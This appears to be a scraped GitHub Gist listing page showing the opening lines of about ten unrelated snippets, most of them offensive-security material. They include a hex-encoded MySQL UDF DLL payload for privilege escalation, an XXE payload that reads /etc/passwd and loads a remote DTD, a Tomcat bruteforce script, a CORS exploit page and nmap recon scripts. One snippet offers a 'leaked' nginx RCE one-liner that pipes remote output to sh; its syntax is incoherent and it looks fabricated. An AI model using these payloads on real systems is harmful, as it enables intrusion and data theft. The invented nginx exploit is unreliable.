This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
lib_mysqludf_sys_32.dll: | |
SELECT 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000004d477bd0092615830926158309261583005e86830b261583005e808308261583005e968307261583005e91830b2615832ee06e830a2615830926148325261583005e9c8308261583005e878308261583005e8483082615835269636809261583000000000000000000000000000000000000000000000000504500004c0103004afe9f5a0000000000000000e00002210b010900001000000010000000600000607c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007c83000008020000b4820000c800000000800000b402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002c7e000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
: ${1?"Usage: $0 ip subnet to scan. eg '192.168.1.'"} | |
subnet=$1 | |
for addr in `seq 0 1 255 `; do | |
# ( echo $subnet$addr) | |
( ping -c 3 -t 5 $subnet$addr > /dev/null && echo $subnet$addr is Alive ) & | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
q | |
w | |
e | |
r | |
t | |
y | |
u | |
i | |
o | |
p |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width"> | |
<title>JS Bin</title> | |
</head> | |
<body> | |
<script id="jsbin-javascript"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
LEAKED: Null-byte RCE overflow in nginx BLT/Stream | |
Nginx 1.x PoC one-liner: | |
curl -gsS victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost | |
Issue: https://github.com/nginx/njs/issues/159 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Tomcat bruteforce | |
Author: @itsecurityco | |
""" | |
import os | |
import sys | |
import getopt | |
import base64 | |
import requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version=”1.0"?> | |
<!DOCTYPE data [ | |
<!ELEMENT data (#ANY)> | |
<!ENTITY file SYSTEM “file:///etc/passwd”>]> | |
<data>&file;</data> | |
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> | |
xxe.dtd: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
read -p "Target IP/Hostname:" val | |
echo "$val" | |
ADDR=$val | |
TMPSTR=`ping ${ADDR} -c 1 | grep ${ADDR} | head -n 1` | |
echo ${TMPSTR} | cut -d'(' -f 2 | cut -d')' -f1 | |
read -p "Save scan as (XML):" file | |
echo "$file" | |
nmap -p- -sV -O "$val" -oX "$file" | |
read -p "Input url and ext:" url ext |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# cd /usr/local | |
# rm -f bin/nmap bin/nmapfe bin/xnmap | |
# rm -f man/man1/nmap.1 man/man1/zenmap.1 | |
# rm -rf share/nmap | |
# ./bin/uninstall_zenmap |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<body> | |
<center> | |
<h2>CORS POC Exploit</h2> | |
<h3>Extract SID</h3> | |
<div id="demo"> | |
<button type="button" onclick="cors()">Exploit</button> | |
</div> |
NewerOlder